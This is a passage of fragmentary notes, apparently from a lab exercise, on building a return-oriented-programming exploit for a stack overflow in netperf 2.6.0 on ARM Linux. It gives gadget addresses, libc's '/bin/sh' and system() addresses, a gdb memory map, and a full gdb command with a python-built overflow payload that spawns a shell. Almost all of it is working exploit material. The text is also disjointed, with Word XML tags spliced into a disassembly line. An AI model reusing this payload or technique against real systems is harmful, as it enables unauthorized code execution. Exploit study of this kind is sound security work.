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Payloads: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0xf7fd3533 : pop {r4, pc} (change from 0xf7fd3532 to 0xf7fd3533)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0xf7ee6db0 "/bin/sh"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0xf7fd3187 : mov r0, r4 ; pop {r4, r5, r6, pc} (change from 0xf7fd3186 to 0xf7fd3187)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info proc mapping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7748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address spaces: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 Addr   End Addr       Size     Offset objfile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0x10000    0x42000    0x32000        0x0 /home/pi/Desktop/hpconarm/exploits/netperf-2.6.0/src/netperf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0x51000    0x52000     0x1000    0x31000 /home/pi/Desktop/hpconarm/exploits/netperf-2.6.0/src/netperf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0x52000    0x57000     0x5000    0x32000 /home/pi/Desktop/hpconarm/exploits/netperf-2.6.0/src/netperf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0x57000    0x66000     0xf000        0x0 [heap]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0xf7e0f000 0xf7ef3000    0xe4000        0x0 /lib/arm-linux-gnueabihf/libc-2.28.so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0xf7ef3000 0xf7f03000    0x10000    0xe4000 /lib/arm-linux-gnueabihf/libc-2.28.so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0xf7f03000 0xf7f05000     0x2000    0xe4000 /lib/arm-linux-gnueabihf/libc-2.28.so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0xf7f05000 0xf7f06000     0x1000    0xe6000 /lib/arm-linux-gnueabihf/libc-2.28.so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0xf7f06000 0xf7f09000     0x3000        0x0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0xf7f09000 0xf7f73000    0x6a000        0x0 /lib/arm-linux-gnueabihf/libm-2.28.so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0xf7f73000 0xf7f82000     0xf000    0x6a000 /lib/arm-linux-gnueabihf/libm-2.28.so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0xf7f82000 0xf7f83000     0x1000    0x69000 /lib/arm-linux-gnueabihf/libm-2.28.so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0xf7f83000 0xf7f84000     0x1000    0x6a000 /lib/arm-linux-gnueabihf/libm-2.28.so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0xf7f84000 0xf7f86000     0x2000        0x0 /lib/arm-linux-gnueabihf/libdl-2.28.so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0xf7f86000 0xf7f95000     0xf000     0x2000 /lib/arm-linux-gnueabihf/libdl-2.28.so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0xf7f95000 0xf7f96000     0x1000     0x1000 /lib/arm-linux-gnueabihf/libdl-2.28.so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0xf7f96000 0xf7f97000     0x1000     0x2000 /lib/arm-linux-gnueabihf/libdl-2.28.so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0xf7fc6000 0xf7fde000    0x18000        0x0 /lib/arm-linux-gnueabihf/ld-2.28.so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0xf7feb000 0xf7fed000     0x2000        0x0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0xf7fed000 0xf7fee000     0x1000        0x0 [sigpage]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0xf7fee000 0xf7fef000     0x1000    0x18000 /lib/arm-linux-gnueabihf/ld-2.28.so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0xf7fef000 0xf7ff0000     0x1000    0x19000 /lib/arm-linux-gnueabihf/ld-2.28.so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0xfffcd000 0xffff0000    0x23000        0x0 [stack]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0xffff0000 0xffff1000     0x1000        0x0 [vectors]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d188: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d532:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">bd10      </w:t>
        <w:tab/>
        <w:t xml:space="preserve">pop</w:t>
        <w:tab/>
        <w:t xml:space="preserve">{r4, pc}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"AAAA"*3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 = (&lt;text variable, no debug info&gt; *) 0xf7e3cc8d &lt;system&gt; (change from 0xf7e3cc8c to 0xf7e3cc8d)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gdb --args ./netperf -a `python -c 'print "A"*8220+"\x33\x35\xfd\xf7"+"\xb0\x6d\xee\xf7"+"\x87\x31\xfd\xf7"+"AAAA"*3+"\x8d\xcc\xe3\xf7"'`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x/64xw $sp+25700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assembler code for the program that are not in the ROPGadget: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proc mapping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start, +length, (int)machinecode_hex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x/16i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http://shell-storm.org/online/Online-Assembler-and-Disassembler/?inst=mov+r0%2C+r4&amp;arch=arm&amp;as_format=inline#assembly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